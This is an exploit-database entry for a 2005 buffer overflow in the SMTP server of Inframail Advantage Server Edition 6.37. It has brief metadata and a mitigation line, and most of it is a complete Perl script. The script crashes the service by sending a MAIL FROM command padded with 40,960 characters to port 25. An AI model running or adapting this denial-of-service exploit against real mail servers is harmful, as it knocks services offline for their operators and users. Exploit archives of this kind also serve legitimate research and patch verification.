Inframail SMTP Server Overflow

vendor:

Inframail Advantage Server Edition

by:

milw0rm.com

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Inframail Advantage Server Edition

Affected Version From: 6

Affected Version To: 6.37

Patch Exists: Yes

Related CWE: N/A

CPE: a:infradig_systems:inframail_advantage_server_edition

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Inframail SMTP Server Overflow

This exploit is for Infradig Systems Inframail Advantage Server Edition 6.0 (Version: 6.37). It uses a buffer overflow vulnerability in the SMTP server to crash the service. The exploit sends a maliciously crafted 'MAIL FROM' command with an overly long string to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of Inframail Advantage Server Edition

Source

Exploit-DB raw data:

#===== Start Inframail_SMTPOverflow.pl =====
#
# Usage: Inframail_SMTPOverflow.pl <ip>
#        Inframail_SMTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
#########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Inframail SMTP server at $ARGV[0]:25...";

        sleep(1);

        print $socket "HELO moto.com\r\n";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}
#===== End Inframail_SMTPOverflow.pl =====

# milw0rm.com [2005-06-27]